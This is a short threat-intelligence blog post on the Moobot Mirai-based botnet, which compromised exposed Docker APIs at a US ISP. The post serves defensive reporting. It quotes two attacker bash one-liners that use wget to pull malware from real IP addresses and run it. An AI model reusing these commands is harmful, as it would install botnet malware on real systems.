There is an abundance of Mirai-based botnets in the wild however “Moobot”, which targets vulnerable Docker APIs, recently showed up on our radar. This blog describes Moobot development along with the malware variant details. A full indicator list is also provided in our GitHub repository.
As early as September 20th, one of these variants belonging to DDOS botnet Moobot, was used as the payload in a campaign targeting vulnerable docker APIs. After identifying vulnerable APIs, Moobot would modify an existing image to run a cron job and download Mirai . Currently only one provider, a US based ISP, appears to be affected by this activity however Moobot was successful in compromising over 10% of their docker deployments.
Note: “Mirai” refers to the source code behind the IOT botnet that has historically targeted vulnerable routers, IP cameras, and DVRs with a suite of exploits. In 2016, the Mirai source code was released and unsurprisingly a massive increase in attacks followed.
Figure 1. Modified Image
Going by the image name, the original container was likely intended for speed testing. After modification, the image is renamed to either /test1, or /test2 and one of two commands executed:
/bin/bash -c ‘apt-get update && apt-get install -y wget cron;service cron start; wget 45.63.53.4/arm7;chmod +x arm7;./arm7;tail -f /dev/null’
/bin/bash -c ‘apt-get update && apt-get install -y wget cron;service cron start; wget 45.14.148.105/k.sh;sh k.sh;tail -f /dev/null’
The arm7 payload from the first wget was identified as the Moobot Mirai-variant.
Read more on: https://www.lacework.com/moobots-cloud-migration/
In 2021, parking app ParkMobile suffered a massive data breach impacting 22 million users whose…
When I first got into cybersecurity, I thought it was all about hackers in hoodies…
The US Air Force is investigating a “privacy-related issue” that may have exposed personally identifiable…
London’s iconic department store Harrods has disclosed that approximately 430,000 customer records were compromised in…
WestJet confirmed that in a June 2025 cybersecurity incident, a “sophisticated, criminal third party” gained…
Imagine getting an email straight from GitHub’s own notification system: the same one you've trusted…
This website uses cookies.